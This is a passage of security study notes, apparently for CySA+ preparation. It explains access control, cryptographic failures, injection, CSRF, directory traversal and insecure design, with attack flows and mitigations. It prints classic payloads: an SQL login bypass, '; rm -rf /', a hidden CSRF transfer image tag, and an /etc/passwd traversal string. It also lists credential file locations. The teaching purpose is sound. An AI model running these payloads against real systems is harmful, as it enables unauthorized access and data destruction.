2. [Developer / System Architect] Use Role-Based Access Control (RBAC)
● Define clear user roles (e.g., admin, user, guest) and restrict actions/resources accordingly
● Ensure all permission logic is centralized and well-tested

3. [Security Analyst] Monitor Logs for Anomalous Access
● Review logs for unexpected access attempts, e.g. one user accessing dozens of unrelated records
● Set up alerts for requests with manual resource ID changes

119

4. [Developer] Apply Object Ownership Validation
● When accessing or modifying data, always confirm the requesting user is the rightful owner
● E.g., if request.user_id != record.owner_id: deny()

5. [All Roles] Perform Authorization Testing
● Include access control testing in QA and security reviews
● Use automated scanners and manual tests to simulate privilege escalation and IDOR attacks

Key Takeaway
Broken access control is a silent but devastating vulnerability. It doesn’t require code injection or memory
corruption — it exploits trust boundaries that were never enforced. Any system that separates users, roles,
or permissions is vulnerable if access rules aren’t strictly verified on the backend. Mitigation requires explicit
server-side enforcement, role management discipline, and continuous validation of access control logic.

Cryptographic Failures — Executive-Level
Breakdown

Definition
Cryptographic failures occur when a system either does not use encryption when it should, or uses
encryption incorrectly, allowing sensitive data to be exposed or manipulated.
These failures include:
● Using weak or outdated algorithms
● Not encrypting sensitive data in transit or at rest

120

● Mishandling keys, certificates, or configurations
● Improper implementation of protocols like TLS, SSL, or encryption libraries

It’s not the cryptography itself that fails — it’s the way people use it that breaks security.

Real-World Analogy (Healthcare)
Imagine a hospital storing sensitive patient records in locked filing cabinets (encryption at rest). But:
● The keys to the cabinets are left on top of the drawer (poor key management)
● Some records are stored in unlocked drawers (unencrypted data)
● Or the cabinets use locks from the 1970s that can be picked in seconds (weak algorithms)

Cryptographic failures are rarely about “bad math” — they’re almost always about bad decisions or
implementation errors.

Common Cryptographic Failures
Failure Type Description Example

No Encryption Sensitive data is transmitted or stored in

plain text

Login credentials sent over HTTP

Insecure Protocols Use of outdated or broken cryptographic

protocols

SSL 2.0, FTP, or Telnet

Weak Algorithms Use of algorithms known to be vulnerable MD5, SHA-1, RC4

Improper Key
Management

Keys are reused, exposed, or poorly
stored

Hardcoded keys in source code or
logs

121

Broken TLS
Configuration

Weak ciphers, expired certs, or missing
certificate validation

Accepting self-signed certs without
warning

Lack of Salting in
Hashing

Passwords hashed without salt, allowing
rainbow table attacks

All users with the same password
have the same hash

Failure to Encrypt at
Rest

Unprotected databases or filesystems Password database stored in plain

text

Attack Flow — Example (Unencrypted Transmission)
1. User submits login credentials to a web application
○ The form is sent via HTTP, not HTTPS
2. Credentials are transmitted in plain text across the network
3. Attacker on the same network captures traffic using Wireshark or tcpdump
4. Attacker sees the username and password in readable form
5. Attacker logs into the system as the user and escalates privileges or exfiltrates data

This is a cryptographic failure due to lack of encryption in transit.

Who Is Involved?
Role Responsibility

Developer Implements encryption protocols in software or applications

System Administrator Configures TLS, certificates, and storage encryption

122

Security Analyst Identifies gaps in encryption coverage or usage of outdated algorithms

Penetration Tester Actively probes for cryptographic weaknesses or plaintext data exposure

Mitigation Strategies — Fully Explained and Role-
Assigned

1. [Developer] Enforce Encryption in Transit
● Use TLS 1.2 or TLS 1.3 for all data transmitted over networks
● Never use HTTP, FTP, or Telnet for sensitive operations
● Redirect all users from HTTP to HTTPS automatically

2. [System Administrator] Implement Encryption at Rest
● Encrypt hard drives, filesystems, and databases that store sensitive data
● Use full-disk encryption for mobile devices or cloud VMs

3. [Developer / Security Engineer] Use Strong Algorithms and Protocols
● Avoid deprecated or weak algorithms (e.g., MD5, RC4, SHA-1)
● Use secure options like AES-256, SHA-256, and RSA-2048 or better
● Rely on modern cryptographic libraries (e.g., OpenSSL, Bouncy Castle)

123

4. [All Roles] Practice Proper Key Management
● Never hardcode keys in source code or store them in logs
● Use hardware security modules (HSMs) or cloud key vaults (AWS KMS, Azure Key Vault)
● Rotate keys regularly and enforce access controls

5. [Developer] Hash Passwords with Salt and Pepper
● Always add a unique salt to each password before hashing
● Use bcrypt, scrypt, or Argon2 for password hashing — not SHA algorithms

6. [Security Analyst] Scan for Cryptographic Misconfigurations
● Run regular scans to identify:
○ Use of weak ciphers
○ Expired or self-signed certificates
○ Insecure TLS versions

Real-World Examples
● Panama Papers (2016) — Law firm used an outdated version of Drupal with no HTTPS, exposing
documents during upload
● LinkedIn (2012) — Passwords were hashed without salt using SHA-1, allowing massive cracking with
rainbow tables
● Equifax (2017) — HTTPS certs were allowed to expire, which disabled internal data exfiltration
detection

Key Takeaway
Cryptographic failures don’t require complex exploits — they result from failing to apply well-known security
principles correctly. Using no encryption, outdated algorithms, or mishandling keys can give attackers a

124
clear path to breach systems. The solution is not better math — it’s better implementation discipline, system
configuration, and data hygiene.

Injection Flaws
Definition (Plain and Clear)
Injection flaws occur when untrusted user input is sent to an interpreter as part of a command or query, and
the system fails to properly validate or sanitize the input.
This allows attackers to inject their own commands, altering the execution of code, queries, or scripts.

Common Types of Injection (Differentiated)
● SQL Injection: Targets databases by injecting malicious SQL code into queries, allowing attackers to
bypass authentication or exfiltrate data.
● Command Injection: Executes arbitrary system-level commands on the server by injecting OS
instructions through unsanitized input fields.
● LDAP Injection: Manipulates Lightweight Directory Access Protocol (LDAP) queries to access or
modify directory service data such as user credentials.
● OS Injection: A broader term sometimes used interchangeably with command injection, emphasizing
the use of system shell commands beyond database interaction.
● XPath/XML Injection: Alters the logic of XML-based queries or XPath expressions to expose or
tamper with structured XML data (e.g., in SOAP APIs or config files).
● NoSQL Injection: Targets document-based databases (like MongoDB) by injecting query operators
(e.g., $ne, $or) to bypass filters or logic controls.

The attacker’s input is not just processed — it becomes part of the logic being executed by the
backend system.

Real-World Analogy (Healthcare)
Imagine a hospital receptionist takes a written request and reads it directly into a dictation system that
interprets and executes it — without verifying what’s written.
A legitimate request says:

125

“Print the patient’s latest blood test results.”
But someone submits:
“Print the patient’s record; delete their psychiatric history; mail it to this address.”
The system blindly executes the full command.
Injection attacks work the same way — by slipping dangerous instructions into what the system thought was
just “text input.”

Core Principle of Exploitation
Injection works because the application fails to separate data from commands, allowing attacker-supplied
input to be interpreted as executable logic. Instead of treating user input as inert data (e.g., a username or
search term), the system embeds it directly into queries or command structures that are then executed by a
backend interpreter.
This creates a collapse between input and instruction, where the system is tricked into running
the attacker&#39;s data as though it were trusted code. Proper systems distinguish between &quot;what
to say&quot; and &quot;what to do&quot; — injection flaws eliminate that boundary.

SQL Injection — Fully Clarified Step-by-Step Attack Flow

Background Context (Before Step 1)
Let’s define the system first:
● A developer creates a login page for a website.
● The login page has two text fields: username and password.
● When the user submits the form, the input is sent to the server.
● The developer has written backend code that constructs an SQL query like this:

126

SELECT * FROM users WHERE username = &#39;[username]&#39; AND password = &#39;[password]&#39;;

This query is constructed by inserting user input directly into the SQL statement, which is
where the vulnerability exists.

Step 1: Normal User Behavior (Baseline)
A normal user visits the website and enters:
● Username: steve
● Password: pass123

The application receives this input and forms the following SQL query:
SELECT * FROM users WHERE username = &#39;steve&#39; AND password = &#39;pass123&#39;;

This query is sent to the database.
● If a matching user is found, the login succeeds.
● If not, the login fails.

So far, everything works as expected.

Step 2: The Vulnerability Exists (But No One Has Exploited It Yet)
The developer made a mistake by directly inserting user input into the query, without validation or
parameterization. This makes the system vulnerable to SQL injection.
No attacker has acted yet — but the system is ready to be exploited due to this flawed design.

Step 3: The Attacker Arrives and Inputs Malicious Data
An attacker visits the same login page and enters:
● Username: admin&#39; --
● Password: (left blank)

127

Let’s break that down:
● The attacker types admin&#39; -- into the username field
● That strange-looking input closes the string and injects a SQL comment

The system constructs the query as:
SELECT * FROM users WHERE username = &#39;admin&#39; --&#39; AND password = &#39;&#39;;

Let’s now explain what this means.

Step 4: Understanding the Role of -- (SQL Comment)
● In SQL, the double dash -- means “everything after this is a comment”
● So the part after the double dash — &#39; AND password = &#39;&#39; — is ignored by the database

The query the database actually sees becomes:
SELECT * FROM users WHERE username = &#39;admin&#39;;

This completely removes the password check.
The database returns the record for the admin user — no password required.

Step 5: The Attacker Is Logged in as Admin
● The attacker is now authenticated as admin, even though they don’t know the password.
● The application thinks the login was valid — because it received a real row from the database.
● The attacker now has admin-level access to the system.

Why This Worked
● The developer trusted user input and combined it directly with executable SQL code.

128

● The attacker exploited that by injecting SQL syntax (&#39; --) into the input field.
● Because the system does not distinguish between data and code, the input became part of the logic
— not just data.

Who Is Involved?
Role Responsibility

Attacker Crafts malicious input to alter backend logic

Developer Writes application code that interfaces with databases, shells, or interpreters

Security Analyst Detects injection attempts in logs, anomalies in query behavior, or suspicious

access patterns

Penetration Tester Tests application inputs for injection exposure and improper input handling

Common Injection Types
Type Target Example Payload

SQL Injection Database queries &#39; OR 1=1 --

Command Injection Operating system shell ; rm -rf /

129

LDAP Injection Directory services *)(userPassword=*)

XML / XPath Injection XML data queries `&#39;]

NoSQL Injection NoSQL queries (e.g., MongoDB) { &quot;$ne&quot;: null }

Why It’s Dangerous
● Can lead to authentication bypass, data leakage, data corruption, or remote code execution
● Often fully automated with scanners and scripts
● Still found in modern systems, especially legacy or poorly validated input fields
● May allow full exfiltration of database contents or server-level compromise

Mitigation Strategies — Fully Explained and Role-
Assigned
1. [Developer] Use Parameterized Queries (Prepared Statements)
● Do not embed raw input into queries
● Use APIs or frameworks that separate code from data
● Examples:
○ In Python (with psycopg2):
cursor.execute(&quot;SELECT * FROM users WHERE username = %s&quot;, [username])
○ In PHP (PDO):
prepare(&quot;SELECT * FROM users WHERE username = :username&quot;)

2. [Developer] Perform Input Validation and Whitelisting
● Only allow expected input formats

130

● Example: only letters and numbers in a username field
● Reject special characters that serve no purpose

3. [System Admin / Security Engineer] Disable Unnecessary Interpreters
● If the application doesn’t need shell commands or certain database features, disable or restrict them
● Harden the environment to limit what injected code can do

4. [Security Analyst] Monitor Logs for Suspicious Patterns
● Look for payloads with &#39;, --, ;, or known injection strings
● Flag repeated failed inputs with suspicious characters

5. [All Roles] Use Web Application Firewalls (WAF)
● A well-tuned WAF can detect and block common injection payloads
● Acts as an additional layer of defense, not a substitute for secure code

Real-World Examples
● Heartland Payment Systems (2008) — SQL injection led to the breach of 100+ million credit cards
● British Airways (2018) — Injection allowed Magecart attackers to skim customer credit card details in
real time
● Equifax (2017) — Injection into Apache Struts exploited a vulnerability in how user-supplied data
was handled

Key Takeaway
Injection flaws occur when applications fail to control how user input interacts with backend logic. The
attacker’s goal is to trick the system into executing their data as commands. Defending against injection

131
means never trusting raw input, separating logic from data through parameterization, and building layered
defenses that detect and block misuse patterns before execution.

Cross-Site Request Forgery (CSRF) —
Executive-Level Breakdown
(CySA+ Domain 2.4: Given a scenario, recommend controls to mitigate attacks and software vulnerabilities)

1. Normal System Behavior (Before Exploitation)
What CSRF Affects:
● Web applications that rely on session-based authentication (cookies)
● Actions that change data or state (profile updates, purchases, password changes)
What Does &quot;Change State&quot; Mean?
A &quot;state change&quot; refers to altering the condition or behavior of the application or user session
— beyond just data storage, it&#39;s about how the system operates as a result of the action.

Now, let&#39;s go through your examples:
1. Profile updates
○ ✅ Changes data: Yes (e.g., name, address, contact info).
○ ✅ Changes state: Possibly, if profile changes trigger status updates (e.g., changing your
email may require re-verification — this is a state change).

2. Purchases

132

○ ✅ Changes data: Yes (order records, inventory).
○ ✅ Changes state: Yes. Purchase initiates order processing state, moves inventory, updates
account balance — clear state change.

3. Password changes
○ ✅ Changes data: Yes (stored hash of the password).
○ ✅ Changes state: Yes. Password change forces re-authentication, may invalidate sessions,
changes the security posture of the account.

Conclusion:
Of your examples:
● Purchases and password changes definitely change the system state.
● Profile updates may or may not — it depends on whether the profile changes affect workflow states
(like triggering re-verification). If they only change stored data without workflow effects, then it&#39;s a
data change but not necessarily a state change.

Simple Summary:
Action Changes Data? Changes State?

Profile Update ✅ Yes ⚠️ Maybe (depends on system rules)

Purchase ✅ Yes ✅ Yes (order state, balance)

Password Change ✅ Yes ✅ Yes (session invalidation, security posture)

A data change refers to updates to stored information, like modifying a user’s name, address,
or phone number. The database records are altered, but the underlying behavior or flow of the
system may remain the same.

133

A state change, by contrast, alters the condition or workflow of the application itself. It
changes how the system behaves moving forward — such as initiating an order process,
requiring re-authentication after a password change, or triggering account re-verification. State
changes often represent transitions in process or security posture, making them high-value
targets for attackers, especially in CSRF scenarios.
Why State Changes Are High-Value Targets in CSRF
State changes affect how a system behaves, not just what it stores. When an attacker successfully triggers a
state change — such as initiating a funds transfer, changing an account password, or updating security
settings — they gain a lever to alter the system’s logic or workflow in their favor. Unlike passive data theft,
state-changing actions modify future conditions, enabling persistent control, fraud, or access escalation. In
CSRF attacks, these changes are especially dangerous because the attacker doesn’t need direct access —
they exploit the user’s authenticated session to silently issue commands, using the browser as a trusted
middleman. This makes state-changing endpoints prime targets, as even a single forged request can cause
long-term damage or unauthorized access.
Normal Process Flow:
1. User logs into a trusted website
○ Example: https://bank.com
○ The server issues a session cookie, stored by the user’s browser.
○ This cookie is sent automatically with every future request to the bank website.
2. User performs legitimate actions
○ User clicks &quot;Transfer Funds&quot;
○ Browser sends:
■ Session cookie: sessionid=abc123
■ POST request: {amount=500, recipient=Bob}

3. Server checks the session cookie
○ If the cookie is valid, the server authorizes the request.
○ Funds are transferred because the session proves the user is authenticated.

Key normal behavior:
The browser automatically sends session cookies with requests, so the user doesn’t have to
log in every time.

Step 1 — Let’s Define All Three Parties Clearly

134

Entity Description

Victim Innocent user, already logged into their bank

account

Bank.com
(Server)

The legitimate bank’s website, trusted by the
victim

Attacker’s site
(evil.com)

Malicious website controlled by the attacker

Step 2 — Understand Browser Behavior
(Normal)
When the victim visits bank.com, the bank sets a session cookie in the victim’s browser.
The browser stores:
bank.com → sessionid=abc123

✅ Important rule:
Browsers automatically send cookies to the correct website when visiting that website.
If the victim clicks any link or loads any image from bank.com, their browser will automatically send:
Request to: bank.com
Headers: Cookie: sessionid=abc123
So far, this is normal behavior. No attack. No confusion.

Step 3 — Now, Let’s Build the Attack
Mechanism Slowly

135

What does the attacker want?
The attacker wants bank.com to do something dangerous:
Example: Transfer money.
But:
The attacker cannot talk directly to bank.com — they don’t have the victim’s session cookie.
So the attacker uses the victim’s browser as an unwitting accomplice.
How does the attacker do this?
The attacker creates a fake website:
evil.com
On evil.com, they embed hidden code:
&lt;img src=&quot;https://bank.com/transfer?amount=1000&amp;recipient=attacker&quot;&gt;
This is not visible to the victim — it’s hidden in the page.
But the victim’s browser sees this line of code and does what browsers do:
1. Browser: &quot;I need to load an image from https://bank.com/transfer?amount=1000...&quot;
2. Browser: &quot;Since I&#39;m contacting bank.com, let me include my cookie for bank.com!&quot;
So even though the victim is on evil.com, the browser automatically includes the bank.com cookie in the
request to bank.com, because:
● The request is going to bank.com
● The browser does not care that it came from evil.com
● Browsers always include cookies for matching domains
Step 4 — Why the Sentence Is True
&quot;The browser automatically includes session cookies for requests to the legitimate site, even if
the request originated from a different malicious site.&quot;
✔️ ✅ Now it makes sense:
● &quot;Request to the legitimate site&quot; = The image source is bank.com/transfer.
● &quot;Request originated from a malicious site&quot; = The fake website evil.com is what caused the browser
to make the request.
Your browser is on evil.com, but because the image source points to bank.com, the browser includes the
bank.com session cookie — because browsers do not check where the request came from. They just see:
● Destination bank.com? → include bank.com cookies.

136

The browser is loyal to the destination domain, not to the source of the command.

Step 5 — Visual Flow

[Victim visits evil.com]
[eviI.com webpage contains: &lt;img src=&quot;https://bank.com/transfer?...&quot;&gt;]
[Victim&#39;s browser sees request to bank.com]
[Browser includes bank.com session cookie: sessionid=abc123]
[Bank.com processes request, trusts session, performs transfer]

Step 6
&quot;The victim’s browser automatically includes their valid session cookie in any request to the
legitimate site, even when that request was silently triggered by an attacker-controlled
website.&quot;
Summary:
● You are on evil.com, but the hidden image points to bank.com
● The browser always includes the bank.com cookie when sending requests to bank.com, regardless
of where the request came from.
● The attacker tricks the browser into sending the request to bank.com, leveraging the browser&#39;s
normal behavior.
2. Where the Vulnerability Exists
The problem is:
● The server trusts the session cookie as proof of authentication.
● It does not verify whether the request was intentionally made by the user.
● The browser automatically includes session cookies for requests to the legitimate site, even if the
request originated from a different, malicious site.

137

The system fails to confirm the origin and intent of the request.

3. Attacker Flow — Step by Step
Scenario: The attacker wants to force the victim to transfer money without
their consent.
1.
2. Attacker identifies a vulnerable action
○ Example:
■ URL: https://bank.com/transfer?amount=1000&amp;recipient=attacker

3. Attacker crafts a malicious webpage

The page contains hidden code:
&lt;img src=&quot;https://bank.com/transfer?amount=1000&amp;recipient=attacker&quot; style=&quot;display:none&quot;&gt;
○ Note: This is an innocent-looking image tag, but it sends a GET request to the bank&#39;s
transfer endpoint.

4. Victim visits attacker’s malicious page
○ Maybe via phishing email, malicious forum post, or infected ad.
5. Browser sends the request automatically
○ Because the victim is already logged in to the bank (has an active session cookie), the
browser includes:
■ sessionid=abc123 (valid session token)

6. Bank server receives the request
○ It sees a valid session cookie and executes the fund transfer, believing the legitimate user
made the request.

7. Result:
○ Funds are transferred to the attacker without the victim ever clicking anything at the bank.
○

138
○ &quot;For a cross-site request forgery attack to succeed, the victim must be logged in to the
target application — meaning their browser holds a valid, active session cookie for that site.
Without this active session, the browser would not include a session cookie in the forged
request, and the server would reject it as unauthenticated.&quot;
○ A session cookie allows the browser to prove the user is already authenticated, so actions
like form submissions or page requests can proceed without repeated logins — but this
automatic inclusion of the session cookie also makes CSRF possible.
○ Reality Check: Timing and Visibility in CSRF Attacks
○ In real-world CSRF attacks, the attacker has no visibility into whether the victim is currently
logged into the target site — and no ability to check. The attack is not precision-timed; it is
opportunistic. Attackers rely on the fact that many users stay logged into web applications
for long periods, with active session cookies stored in their browsers. By embedding CSRF
payloads in phishing emails, malicious ads, or compromised websites, the attacker casts a
wide net. If even a small percentage of users visit the attacker’s page while authenticated to
the target site, the attack can succeed. CSRF is effective not because of perfect timing, but
because of predictable user behavior and automatic browser trust.

8. Session vs. Persistent Cookies: Real-World Behavior and CSRF Risk
Cookie
Type

Description Expiration
Behavior

Common Use
Cases

CSRF Risk
Level

Session
Cookie

Temporary cookie
without an
expiration
date

Deleted when
browser/tab
is closed

Temporary
logins,
private
mode

Lower (short-
lived;
ends
quickly)

Persistent
Cookie

Cookie with an
explicit
expiration
timestamp

Remains in
browser until
expiration or
logout

&quot;Remember
Me&quot;, social
media,
email

Higher (can
persist
for days
or
weeks)

9. Optional Footnote for Clarity Note: Many users keep multiple tabs open or rarely close
their browsers, which means even session cookies may remain active for long periods in practice —
blurring the line between session and persistent behavior.
4. System Reaction and Consequence
The bank’s server sees:
● Valid session token ✅
● Valid request format ✅

139

But:
● No verification of request origin or user intent.

The server performs the sensitive action because it implicitly trusts the session cookie without confirming
who actually initiated the request.
Impact:
● Unauthorized fund transfers
● Account changes
● Password changes
● Data deletion
All without user consent or awareness.

5. Mitigation Strategies — Fully Explained and Role-Assigned
1. [Developer] Implement Anti-CSRF Tokens
● Generate unique, unpredictable tokens for every sensitive request.
● Require the token to be included in the body or header of POST requests.
Example:
&lt;input type=&quot;hidden&quot; name=&quot;csrf_token&quot; value=&quot;random123&quot;&gt;
● Attacker cannot guess or obtain this token because it is session-specific and not auto-included by
browsers.

2. [Developer / System Architect] Enforce SameSite Cookie Attribute
● Set cookies to SameSite=Strict or SameSite=Lax to control cross-site request behavior.
● Strict: Cookies are never sent on cross-origin requests.
● Lax: Cookies are sent only for top-level navigation, not for hidden requests like &lt;img&gt;.

3. [Security Analyst] Monitor for Unusual Request Patterns
● Detect suspicious patterns such as:

140

○ Multiple sensitive actions from a user within seconds
○ Actions performed without usual navigation paths (e.g., no &quot;click-through&quot;)

4. [Developer] Require Re-authentication for Critical Actions
● For sensitive transactions (like changing passwords or transferring funds), force the user to re-enter
their password.
● This step blocks CSRF because attackers cannot supply the password.

5. [Developer / Security Team] Use Content Security Policy (CSP)
● Restrict where requests and scripts can be loaded from.
● CSP won’t prevent CSRF directly but limits malicious third-party sites from loading dangerous
scripts.

6. Reinforcement Summary
● In normal operation, browsers help users by automatically including session cookies with requests.
● The vulnerability is that browsers cannot tell malicious requests from legitimate ones — they just
send cookies automatically.
● The attacker crafts a hidden request to exploit this.
● The server processes the malicious request because it only checks for a valid session cookie, not
intent.
● Defense requires adding deliberate, user-specific markers (tokens), cookie policies, and behavioral
checks to prevent unauthorized actions.
●
● User-Specific Markers (Tokens) in CSRF Defense
● Session cookies authenticate the user — but they’re sent automatically by the browser, with no
indication of who or what initiated the request. To defend against CSRF, servers must require an
additional user-specific marker in each sensitive request: a token that is unique per session and
unpredictable. These are called anti-CSRF tokens. Unlike cookies, which are sent automatically,
tokens must be deliberately included in a form submission or request body by legitimate client-side
code. An attacker cannot guess or generate this token from outside the application. If a request is
missing the correct token — even if it includes a valid session cookie — the server rejects it. In this
way, the token validates intent, confirming that the action came from the real user, not from a forged
cross-site request.
●
●
●

141
● ✅ Summary Cookies authenticate the user’s session automatically, while tokens verify
the user’s intent explicitly — making them complementary tools in secure web application design,
especially for CSRF defense.

Cookies vs. Tokens: Normal Behavior Comparison
Feature Cookies Tokens

Origin / Sent By Generated by the server, sent to the browser via

Set-Cookie header

Generated by the server, embedded in
forms or API responses

Stored By Stored by the browser, scoped to domain and

path

Typically held in page memory or
JavaScript variables

Included In Automatically included by the browser in

matching requests

Must be explicitly added to the
request (e.g., form field, header)

Controlled By Browser enforces inclusion based on
domain/path/cookie flags

Application controls generation and
validation

Use Case Maintains session state, &quot;logged in&quot; status Proves user intent for sensitive
actions, prevents CSRF

Vulnerability Risk Vulnerable to CSRF if not protected (browser

includes them blindly)

Strong CSRF protection — attacker
cannot forge without knowing the token

Visibility to
Attacker

Hidden from other domains by Same-Origin
Policy — but included in forged requests

Not included in cross-site requests —
attacker cannot inject or retrieve

Summary:
Cookies are used to passively identify the user’s session, while tokens actively verify that the user
intentionally initiated a specific action. Together, they help enforce both identity and intent — a critical
pairing for web application security.

142
Directory Traversal — Executive-Level Breakdown
(CySA+ Domain 2.4: Given a scenario, recommend controls to mitigate attacks and software vulnerabilities)

1. Normal System Behavior (Before Exploitation)
What the Application Is Supposed to Do:
Many web applications allow users to access files stored on the server, such as:
● Downloading PDF reports
● Viewing profile pictures
● Accessing log files or help documentation

To support this, the application often lets the user pass a filename as a parameter in the URL:
GET /view?file=report.pdf
Expected behavior:
● The server has a designated folder (e.g., /documents) where files are stored.
The application appends the requested filename to that directory:
/documents/report.pdf
Only safe, expected files are retrieved — nothing outside the allowed folder.

2. Where the Vulnerability Exists
The problem arises when:
● The application does not sanitize or restrict what file names can be submitted.
● The server builds the file path based directly on user input without validation.

This allows attackers to manipulate the path to escape the intended directory using ../ — a special symbol in file
systems that means &quot;go up one directory.&quot;
This is called a directory traversal (also known as a path traversal) attack.

143

3. Attacker Flow — Step-by-Step
Let’s say the application is supposed to retrieve this file:
GET /view?file=help.txt
→ Translates to: /webroot/files/help.txt
But the attacker tries:
GET /view?file=../../../../etc/passwd
→ Translates to: /etc/passwd
../ moves the path up one level — multiple ../ allow the attacker to climb out of the allowed folder.
Step-by-Step:
1. Application accepts a file name as input.
○ file=report.pdf
2. Server builds the path using user input without validation.
○ &quot;/files/&quot; + user_input
3. Attacker sends a crafted input:
○ file=../../../../etc/passwd
4. Server builds final path:
○ /files/../../../../etc/passwd
○ Which resolves to: /etc/passwd
5. Server reads the file and sends it back — unknowingly exposing sensitive system files.

4. System Reaction and Consequence
If the application:
● Does not validate file names
● Does not enforce directory restrictions
● Allows the operating system to resolve full paths blindly

144

Then the attacker can:
● Access system files (/etc/passwd, boot.ini)
● Steal credentials, API keys, or environment variables
● Read source code
● Bypass access controls and dump private information

This kind of access can quickly lead to privilege escalation, reconnaissance, or lateral movement within the
system.
Why Attackers Target Credentials, API Keys, and Environment Variables
When attackers exploit directory traversal, they’re not just looking for text files — they’re often after
files that contain sensitive application secrets. This includes configuration files that store credentials
(like database usernames and passwords), API keys (tokens that allow access to third-party services
like payment processors or cloud platforms), and environment variables (system-level settings that
may include encryption keys, private tokens, or debug access flags). These values are rarely
encrypted and often stored in plain text during development or deployment. If exposed, attackers can
move laterally, access other systems, or impersonate trusted services. In modern web applications,
stealing these secrets is often more damaging than reading user data directly.
Common Application Secrets and Their Risks
Database Credentials

○ Common Location: .env files, config.php, .yml
○ Access Grants: Full access to user data and backend databases
○ Risk if Exposed: Data theft, account manipulation, privilege escalation
● API Keys
○ Common Location: .env, source code, configuration files
○ Access Grants: External services (e.g., Stripe, Twilio, Google Maps)
○ Risk if Exposed: Financial abuse, impersonation of the app, service abuse
● OAuth Tokens / JWTs (JSON Web Token)
○ Common Location: .env, in-memory, local storage
○ Access Grants: Authentication or identity delegation for users or services
○ Risk if Exposed: Account hijacking, login bypass, identity impersonation
● Encryption Keys

145

○ Common Location: .env, .pem files, configuration files
○ Access Grants: Ability to decrypt sensitive data at rest or in transit
○ Risk if Exposed: Exposure of personal, financial, or health-related data
● Cloud Provider Secrets
○ Common Location: .aws/credentials, .env, instance metadata
○ Access Grants: Full access to cloud resources (e.g., AWS, Azure, GCP)
○ Risk if Exposed: Infrastructure takeover, data loss, ransomware potential
● SSH Private Keys
○ Common Location: ~/.ssh/id_rsa, deployment scripts, dev machines
○ Access Grants: Remote shell access to production or internal servers
○ Risk if Exposed: Remote code execution, persistent backdoor creation

5. Mitigation Strategies (Role-Assigned)
1. [Developer] Use Allowlist for File Names
● Only allow specific, expected file names.
● Example: Only permit .pdf or .txt in a predefined list.
● Reject inputs with ../, null bytes, or unusual characters.

2. [Developer] Never Trust User Input to Build File Paths
● Don’t directly concatenate user input with directory paths.
● Use secure, language-specific file handling APIs that normalize paths and prevent traversal.

3. [System Administrator] Enforce Directory Jail (Chroot or Sandboxing)
● Configure the server to only allow file access within a specific directory.
● Even if a path traversal is attempted, it cannot escape the jail.
What Is a Directory Jail (Chroot or Sandboxing)?
A directory jail is a system-level containment technique where a process or application is restricted to a specific
portion of the file system — typically a folder and its subdirectories. This isolated environment is often referred to as a

146
&quot;chroot jail&quot; (short for &quot;change root&quot;). From the perspective of the application, this restricted directory becomes the
new root, meaning it cannot see or access files outside of it. Even if an attacker tries to use ../ in a path traversal
attack to escape the current directory, the system treats the jail as the top-level directory, making escape impossible.
This adds a powerful layer of protection, especially for file-handling applications, by ensuring they are blind to the
rest of the server’s file system, even if input validation fails.

4. [Security Analyst] Monitor Logs for Suspicious Path Patterns
● Look for requests containing ../, double URL-encoding (%2e%2e), or access attempts to OS directories.
● Alert or block on detection.

5. [QA / Security Tester] Perform Penetration Testing
● Include path traversal payloads in your test cases.
● Ensure access to outside directories is blocked.

6. Reinforcement Summary
Directory traversal attacks exploit the server’s assumption that user-supplied file paths are safe. When input is not
properly validated, attackers can craft file paths using ../ sequences to escape intended directories and access
sensitive files. The vulnerability arises not from the file system itself, but from insecure path construction using
untrusted input. Preventing this class of attack requires both input validation (allowlisting) and system-level
containment strategies like directory sandboxing.

Insecure Design
(CySA+ Domain 2.4 — Given a scenario, recommend controls to mitigate attacks and software vulnerabilities)

147

1. Normal System Behavior (Before Exploitation)
What the Application Is Meant to Do:
In a securely designed system:
● Features are built based on threat modeling and business risk awareness
● Only authorized actions are allowed
● Sensitive functions are restricted by role
● Input is validated, sensitive data is protected, and every action has an accountable security decision
behind it

In other words, security is built in from the start — not patched in later.

2. Where the Vulnerability Exists
Insecure design is not a coding bug or a misconfiguration — it’s a fundamental flaw in the architecture or logic of
a system.
It happens when:
● The system does what it&#39;s designed to do — but what it’s designed to do is insecure
● Developers build functionality without considering how it could be abused
● Security is treated as a feature to add later, instead of a requirement during design

This is not about a mistake in code — it’s a mistake in thinking.
Examples of insecure design:
● A password reset feature that doesn’t verify identity
● A multi-tenant system that doesn’t properly separate users’ data
● An e-commerce app that lets users change prices in their shopping cart

3. Attacker Flow — Step-by-Step Example

148

Let’s take a realistic business logic flaw:
Scenario: E-commerce discount abuse
1. System is designed to allow discount codes.
○ Example: SAVE10 gives 10% off.
2. No restriction is placed on how many times a user can apply the code.
3. Attacker manually applies the same discount code repeatedly, reducing the price toward $0.
4. System accepts it.
○ Why? Because the application was never designed to stop this behavior.
5. No validation, no alerting — just insecure logic.

The attacker didn&#39;t exploit a vulnerability in the server or inject code — they simply followed the logic of the
application to a place it should never have allowed.

4. System Consequences
Because insecure design flaws are often invisible to scanners or firewalls, they:
● Go undetected in code reviews or automated testing
● Aren’t patched because there’s technically nothing “broken”
● Can be repeatedly exploited without triggering alerts
● Often lead to financial loss, data exposure, privilege abuse, or long-term access for attackers

5. Mitigation Strategies (Role-Assigned)
1. [Architect / Developer] Perform Threat Modeling
● During the design phase, identify what could go wrong with each feature.
● Think through abuse cases, not just use cases.
● Ask: If I were an attacker, how would I misuse this function?

149

2. [Developer / Product Owner] Apply Secure Design Principles
● Enforce least privilege and separation of duties
● Build features with guardrails — not just functionality
● Do not assume user behavior will always follow intended paths

3. [Security Analyst / QA] Review Business Logic
● Test for logical abuse cases — not just technical exploits
● Simulate unusual user behavior (e.g., repeat coupon use, cancel timing abuse)
● Look for actions the system should never have allowed, even if they return HTTP 200
● HTTP 200 is a standard response code indicating that a web request was successful — but it does not
necessarily mean the action was legitimate or secure.

4. [Organization Leadership] Treat Security as a Design Priority
● Integrate security into product planning and feature scoping
● Avoid building systems with &quot;add security later&quot; mindsets
● Fund secure software development lifecycle (SSDLC) efforts

6. Reinforcement Summary
Insecure design flaws arise not from broken code, but from broken assumptions. These flaws occur when systems
are built without full consideration of attacker behavior, business risk, or abuse potential. The code works — but the
design fails. Unlike buffer overflows or injection, these flaws don’t announce themselves with crashes or errors; they
quietly allow exploitation within the system’s own rules. Preventing them requires shifting security left into the
design phase, where the architecture and logic are built with resilience in mind — not just functionality. Shifting
security left means embedding security considerations into the earliest stages of system design, so that flaws are
prevented by architecture — not patched after deployment.
Key Differences: Insecure Design vs. Insecure Implementation vs. Misconfiguration
● Insecure Design
○ What it is: A flaw in the system’s architecture or logic
○ When it happens: During the planning or design phase
○ Example: A password reset flow that doesn’t verify user identity

150

